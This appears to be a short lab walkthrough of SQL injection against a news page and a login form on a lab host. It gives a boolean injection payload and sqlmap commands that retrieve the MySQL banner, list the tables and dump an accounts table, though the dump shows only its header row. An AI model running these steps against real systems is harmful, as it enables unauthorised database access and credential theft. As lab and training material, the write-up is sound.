The page has a simple news page with the news item requested through an id=# parameter. First I enter an invalid ID but with a true OR clause and the page returns content:
id=777 OR 'a'='a';
Then I change the OR clause to a false statement and the page returns no data but no error either so I'm happy it is susceptible to an injection.
First I try to just pull the banner to confirm sqlmap can access the DBMS:
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -p id --technique=B -b
[13:01:33] [INFO] retrieved: 5.5.38-0+wheezy1
back-end DBMS: MySQL >= 5.0.0
banner: '5.5.38-0+wheezy1'
Happy with that I then pull the tables and finally the content of the accounts table which gives me multiple logins (clear text passwords tut tut). Note as it's a lab I'm not concerned with noise/ traffic so I up the threads to 4.
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 1-p id --technique=B --tables
[13:03:26] [INFO] retrieved: 2
[13:03:29] [INFO] retrieved: information_schema
[13:04:15] [INFO] retrieved: awd
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -p id --technique=B -D awd -T accounts --dump --threads 4
Database: awd
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id | email | password | displayname |
+------+-----------------------------------------------------+-------------+-------------------+
There's a second form on the site with a login, similar test show it's also vulnerable so I run another attack, this time I run the login attempt through burpsuite and export the proxy intercept as login.req to use with sqlmap. Then run the following:
sudo sqlmap -r ./login.req -p username -b --dbms=mysql
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.38-0+wheezy1'
